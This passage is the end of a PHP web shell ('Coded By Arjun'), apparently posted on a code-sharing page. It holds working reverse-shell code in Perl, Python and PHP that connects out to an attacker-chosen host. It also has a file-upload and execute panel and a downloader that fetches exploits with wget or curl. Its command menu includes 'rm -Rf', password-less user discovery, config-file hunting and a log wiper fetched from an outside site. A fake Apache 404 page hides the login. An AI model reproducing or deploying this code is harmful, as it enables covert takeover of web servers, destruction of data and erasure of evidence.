6735 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
6736 $bdmessage = "<pre>$out
6737 ".execmd("ps aux | grep bp.pl")."</pre>";
6738 }
6739 }
6740 }
6741 }
6742 else if(isset($_POST['backconnect']))
6743 {
6744 if($_POST['ip'] != "" && $_POST['port'] != "")
6745 { ?><script type="text/javascript">gethome('connect');</script><?php
6746 $host = $_POST['ip'];
6747 $port = $_POST['port'];
6748 if($_POST["lang"] == "perl")
6749 {
6750 if(is_writable("."))
6751 {
6752 @$fh=fopen(getcwd()."/bc.pl",'w');
6753 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
6754
6755 @fclose($fh);
6756 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6757 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
6758 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
6759 }
6760 else
6761 {
6762 @$fh=fopen("/tmp/bc.pl","w");
6763 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
6764 @fclose($fh);
6765 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6766 execmd("perl /tmp/bc.pl $host $port &",$disable);
6767 if(!@unlink("/tmp/bc.pl"))
6768 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
6769 }
6770 }
6771 else if($_POST["lang"] == "python")
6772 {
6773 if(is_writable("."))
6774 {
6775 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
6776 if($w_file)
6777 {
6778 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
6779 @fclose($w_file);
6780 chmod(getcwd().'/bc.py', 0777);
6781 }
6782 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
6783 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6784 if(!@unlink(getcwd()."/bc.py"))
6785 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
6786 }
6787 else
6788 {
6789 $w_file=@fopen("/tmp/bc.py","w");
6790 if($w_file)
6791 {
6792 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
6793 @fclose($w_file);
6794 chmod('/tmp/bc.py', 0777);
6795 }
6796 execmd("python /tmp/bc.py $host $port &",$disable);
6797 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6798 if(!@unlink("/tmp/bc.py"))
6799 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
6800 }
6801 }
6802 else if($_POST["lang"] == "php")
6803 {
6804 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6805 $ip = $_POST['ip'];
6806 $port=$_POST['port'];
6807 $sockfd=fsockopen($ip , $port , $errno, $errstr );
6808 if($errno != 0)
6809 {
6810 $bdmessage = "<font color='red'><b>$errno</b> : $errstr</font>";
6811 }
6812 else if (!$sockfd)
6813 {
6814 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
6815 }
6816 else
6817 {
6818 fputs ($sockfd ,"
6819 =================================================================
6820 Coded By Arjun
6821 =================================================================");
6822 $pwd = exec_all("pwd");
6823 $sysinfo = exec_all("uname -a");
6824 $id = exec_all("id");
6825 $len = 1337;
6826 fputs($sockfd ,$sysinfo . "
6827 " );
6828 fputs($sockfd ,$pwd . "
6829 " );
6830 fputs($sockfd ,$id ."
6831
6832 " );
6833 fputs($sockfd ,$dateAndTime."
6834
6835 " );
6836 while(!feof($sockfd))
6837 {
6838 $cmdPrompt ="(dhanush)[$]> ";
6839 fputs ($sockfd , $cmdPrompt );
6840 $command= fgets($sockfd, $len);
6841 fputs($sockfd , "
6842 " . exec_all($command) . "
6843
6844 ");
6845 }
6846 fclose($sockfd);
6847 }
6848 }
6849 }
6850 }
6851 else if(isset($_GET['download']))
6852 download();
6853 else
6854 {
6855 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
6856 }
6857 $is_writable = is_writable($dir)?"< writable >":"<font class=txt>< not writable ></font>";
6858 ?>
6859 </p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
6860 <table style="width:100%;" class="tbl" border="1">
6861 <tr>
6862 <td align="center">
6863 <form method="post" enctype="multipart/form-data">
6864 Upload file : <br><input class="upld" type="file" name="uploadfile" class="box" size="50">
6865 <input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
6866 <input type=submit value="Upload" name="u" value="u" class="but" ></form>
6867 <span name="wrtble"><?php
6868 echo $is_writable; ?></span>
6869 </td>
6870 <td align="center" style="height:105px;">Create File :
6871 <form onSubmit="createdir('Create',createfile.value);return false;">
6872 <input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
6873 <input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
6874 </form>
6875 <span name="wrtble"><?php
6876 echo $is_writable; ?></span>
6877 </td>
6878 </tr>
6879 <tr>
6880 <td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
6881 <input type="text" class="box" name="execute"> <input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
6882 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
6883
6884 <td align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
6885 <input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
6886 <input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
6887 </form><span name="wrtble"><?php
6888 echo $is_writable; ?></span>
6889 </td></tr>
6890 <tr>
6891 <td class="btmtbl" align="center">Read File<form onSubmit="createdir('readfile',readfile.value);return false;">
6892 <input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readfile" id="readfile">
6893 <input type="button" onClick="createdir('readfile',readfile.value)" value="Read" class="but">
6894 </form></td>
6895 <td class="btmtbl" align="center">Read Directory<form onSubmit="changedir('dir',readdir.value);return false;">
6896 <input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readdir" id="readdir">
6897 <input type="button" onClick="changedir('dir',readdir.value)" value=" View " class="but">
6898 </form></td></tr>
6899 <tr><td style="height:105px;" align="center">Get Exploit <form method="post" actions="<?php echo $self; ?>">
6900 <input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
6901 <input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
6902 <input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
6903 <select name="functiontype" class="sbox">
6904 <option value="wwget">wget</option>
6905 <option value="wlynx">lynx</option>
6906 <option value="wfread">fread</option>
6907 <option value="wfetch">fetch</option>
6908 <option value="wlinks">links</option>
6909 <option value="wget">GET</option>
6910 <option value="wcurl">curl</option>
6911 </select>
6912 </form><div id="showexp"></div>
6913 </td>
6914 <td align="center">
6915 <form method="post" action="<?php echo $self; ?>">
6916 Some Commands<br>
6917 <?php if($os != "Windows")
6918 { ?>
6919 <SELECT NAME="mycmd" class="box">
6920 <OPTION VALUE="uname -a">Kernel version
6921 <OPTION VALUE="w">Logged in users
6922 <OPTION VALUE="lastlog">Last to connect
6923 <option value='cat /etc/hosts'>IP Addresses
6924 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
6925 <OPTION VALUE="logeraser">Log Eraser
6926 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
6927 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
6928 <OPTION VALUE="find / -type f -name \"config*\"">find config* files
6929 <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
6930
6931 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
6932 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
6933 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
6934 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
6935 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
6936 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
6937 <OPTION VALUE="ps aux">Show running proccess
6938 <OPTION VALUE="uptime">Uptime check
6939 <OPTION VALUE="cat /proc/meminfo">Memory check
6940 <OPTION VALUE="netstat -an | grep -i listen">Open ports
6941 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
6942 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
6943 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
6944 <OPTION VALUE="./zap2">WIPELOGS PT3
6945 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
6946 </SELECT>
6947 <?php } else {?>
6948 <SELECT NAME="mycmd" class="box">
6949 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
6950 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
6951 <OPTION VALUE="systeminfo">System Informations
6952 <OPTION VALUE="net user">User accounts
6953 <OPTION VALUE="netstat -an">Open ports
6954 <OPTION VALUE="getmac">Get Mac Address
6955 <OPTION VALUE="net start">Show running services
6956 <OPTION VALUE="net view">Show computers
6957 <OPTION VALUE="arp -a">ARP Table
6958 <OPTION VALUE="tasklist">Show Process
6959 <OPTION VALUE="ipconfig/all">IP Configuration
6960
6961 </SELECT>
6962 <?php } ?>
6963 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
6964 <input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
6965 </form>
6966 </td>
6967 </tr></table><br>
6968
6969 </td>
6970 </tr>
6971 </table>
6972 <?php
6973
6974
6975 //logout
6976
6977 if(isset($_GET['logout']))
6978 {
6979 setcookie("hacked",time() - 60*60);
6980 header("Location:$self");
6981 ob_end_flush();
6982 }
6983 ?>
6984
6985
6986 <hr color="#1B1B1B">
6987 <div align="center">
6988 <span class=headtitle><font size="6">धनुष</font></span><br><span class=headtitle><font size="6">--==Coded By Arjun==--</font></span><br>
6989 <a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font size="6">जय हिन्द</font></a></div>
6990 <?php
6991 }
6992 }
6993 if(isset($_REQUEST['pass']))
6994 {
6995 if($_REQUEST['pass'] == $pass )
6996 {
6997 setcookie("hacked", md5($pass));
6998 $selfenter = $_SERVER["PHP_SELF"];
6999 header("Location:$selfenter");
7000 }
7001 }
7002
7003 if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
7004 {
7005
7006 ?>
7007 <body bgcolor="#FFFFFF">
7008
7009 <h1 style="color:#000000">Not Found</h1>
7010
7011 <p style="color:#000000">The requested URL was not found on this server.</p>
7012
7013 <hr>
7014
7015 <address style="color:#000000">Apache Server at localhost Port 80</address>
7016
7017 <style>
7018
7019 input { margin:0;background-color:#fff;border:1px solid #fff; }
7020
7021 </style>
7022 </body>
7023 </html>
7024 <?php
7025 }
7026 ?>
7027
7028Copy to clipboard